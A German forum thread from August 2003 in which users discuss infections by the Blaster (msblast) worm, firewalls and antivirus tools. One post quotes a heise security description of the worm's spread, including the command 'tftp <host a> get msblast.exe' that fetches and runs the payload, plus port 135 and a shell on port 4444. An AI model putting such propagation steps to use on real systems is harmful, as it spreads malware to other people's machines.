VIRUS WARNUNG & ABHILFE |
ThE_GuArDiAn
Ehren-DET
Dabei seit: 11.09.2002
Beiträge: 3.345
Herkunft: Ratingen / Hilden
|
|
Und ich bin froh, dass die entsprechenden Ports bei mir dicht sind!
__________________
|
|
12.08.2003 15:30 |
|
|
michaibm
Hornissenstaffelführer
Dabei seit: 11.09.2002
Beiträge: 199
Herkunft: München xdE Allianz: grad kein NDE SDE Allianz: nix
|
|
<spam>
*meinem Norton AV mal nen dicken Schmatz geb*
</spam>
Mich hats trotz Win2k noch nicht erwischt, obwohl ich OutlookExpress und sonstige Krankheiten laufen hab...
__________________ [align=center]Es gibt viele Menschen, die Gott sein wollen,
aber nur einen Gott, der Mensch sein wollte.
Dein Leben spricht, mal lauter, mal leiser.
Du kannst nicht mehr schweigen, deine Taten verraten Dich.
If you live your life as if there were no God... You better be right !
[/align]
|
|
12.08.2003 15:42 |
|
|
BarneY
Kreuzerkapitän
Dabei seit: 13.09.2002
Beiträge: 1.213
Herkunft: Nordlicht xdE Allianz: Ex-[WoD] et al.
|
|
Zitat: |
Original von bialone
Ich nutze auch Norton und mit Outlook hat das nichts zu tun, da der Wurm nicht via Mail übertragen wird. So zumindest die Nachrichtensprecher auf RTL °g Ich öffne grundsätzlich keine Datein, die ich gesandt bekomme und .exe sowieso nicht. Und dennoch hatte ich das Teil drauf. Frag mich bitte nicht wie.
|
So:
Zitat: |
Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.
|
Quelle: http://www.heise.de/security/news/meldung/39347
__________________ I WILL SHOW YOU FEAR IN A HANDFUL OF DUST.[align=RIGHT]T.S. Eliot - [color=#FF8D27]The Waste Land[/COLOR][/align]
|
|
12.08.2003 16:06 |
|
|
bialone
Jagdbootstaffelführer
Dabei seit: 10.09.2002
Beiträge: 634
Themenstarter
|
|
Ich habe es gelesen... alles Fachchinesisch °g
|
|
12.08.2003 16:14 |
|
|
BarneY
Kreuzerkapitän
Dabei seit: 13.09.2002
Beiträge: 1.213
Herkunft: Nordlicht xdE Allianz: Ex-[WoD] et al.
|
|
Ok, auf deutsch:
Der Virus verschickt sich automatisch auf andere Systeme und startet da. Deshalb kann man den Virus selbst dann bekommen, wenn man nur im Internet idlet...
__________________ I WILL SHOW YOU FEAR IN A HANDFUL OF DUST.[align=RIGHT]T.S. Eliot - [color=#FF8D27]The Waste Land[/COLOR][/align]
|
|
12.08.2003 16:22 |
|
|
Raistus
Plasmaturmpolierer
Dabei seit: 29.04.2003
Beiträge: 10
|
|
im zdf gab es eben was in der heute sendung darueber, der wurm zerstoert wohl keine dateien und sorgt nur fuer abstuerze im programmcode des wurms ist eine nachricht an bill gates
hoeren sie auf geld zu machen und bringen sie ihre software in ordnung
so wurde es uebersetzt
__________________ Es gibt dinge im Leben die versteht man einfach nicht
Deine Freundin entwickelt einen Nestbautrieb
Du gehst auf die 30 zu
Deine Katze vergewaltigt dein Bett
|
|
12.08.2003 17:13 |
|
|
CrazyOrca
Jagdbootstaffelführer
Dabei seit: 12.09.2002
Beiträge: 749
Herkunft: Bayern xdE Allianz: [TCon-HC] SDE Allianz: SDE macht nDE kaputt
|
|
lol wie geil....
die kleinen versteckten anchrichten auf den prozessoren sind auch immer ganz nett
|
|
12.08.2003 17:31 |
|
|
DSB
Hornissengeschwaderführer
Dabei seit: 14.06.2003
Beiträge: 214
Herkunft: nein
|
|
so ich tue jetzt mal kund: keiner meiner pcs im heimnetzwerk ist infiziert! *proxy, diversen firewalls und routern dank*
gruß DSB
__________________
|
|
12.08.2003 18:20 |
|
|
Necro
Hornissenpilot
Dabei seit: 20.01.2003
Beiträge: 103
Herkunft: NRW xdE Allianz: allylos SDE Allianz: -GoH-
|
|
Ist das nur bei Win2k oder sind auch andere Systeme betroffen???
__________________
Danke Monty Phyton!!!Für die Erfindung des besten Wortes!!! Vikings (singing elaborately): Spam spam spam spam.
Lovely spam! Wonderful spam!
Spam spa-a-a-a-a-am spam spa-a-a-a-a-am spam.
Lovely spam!Lovely spam! Lovely spam! Lovely spam! Lovely spam!
Spam spam
spam spam
Übersicht des Spamerreichs
Pro Aliens
|
|
12.08.2003 18:36 |
|
|
Schami
Plasmaturmpolierer
Dabei seit: 05.12.2002
Beiträge: 11
Herkunft: Sauerland xdE Allianz: horizon SDE Allianz: dps
|
|
lol was für ein chaos hab hier grad so 3 mann ausm ICQ die wissen wollen wie man das ding wegkriegt!
und übrigens die erfahrung das er beim beköämpfen schlimmer wird hab ich acuh gemacht da ich erst nix von diesem link wußte!
|
|
12.08.2003 18:45 |
|
|
Zort
Grünschnabel
Dabei seit: 12.05.2003
Beiträge: 9
|
|
Hi,
ich möchte mich auch in die Reihe der infizierten einreihen
Bei mir kam übrigens auch ein automatisches ICQ Plugin kurz vorher das ich einfach mal ignoriert hab.. momentan schützt mich nur meine kleine XP Firewall.. hoffe sie hält dicht bis ich das sicherheitsupdate hab
Zort
__________________
|
|
12.08.2003 19:20 |
|
|
Zidkija
Laserturmschütze
Dabei seit: 10.08.2003
Beiträge: 69
Herkunft: Freising xdE Allianz: Sw102
|
|
Also hab gehört das das ganze nur auf bestimmte betriebssysteme zugreifen kann da ich einen server (Linux n alter 86ger ) zwischengeschaltet habe und von dem aus ins I net gehe (die anderen PC´s sind an dem angeschlossen) dürfte der doch nicht durchkommen oder?
Kann ich ruhig
oder muss ich
haben
__________________ Gerüchten zufolge soll der Pfosten Breiter als der geschädigte sein
Heute ist es schwer dumm zu sein... die Konkurenz ist zu groß
|
|
12.08.2003 19:36 |
|
|
BarneY
Kreuzerkapitän
Dabei seit: 13.09.2002
Beiträge: 1.213
Herkunft: Nordlicht xdE Allianz: Ex-[WoD] et al.
|
|
Ich denke das hängt davon ab, wie der Router konfiguriert ist...
__________________ I WILL SHOW YOU FEAR IN A HANDFUL OF DUST.[align=RIGHT]T.S. Eliot - [color=#FF8D27]The Waste Land[/COLOR][/align]
|
|
12.08.2003 19:42 |
|
|
|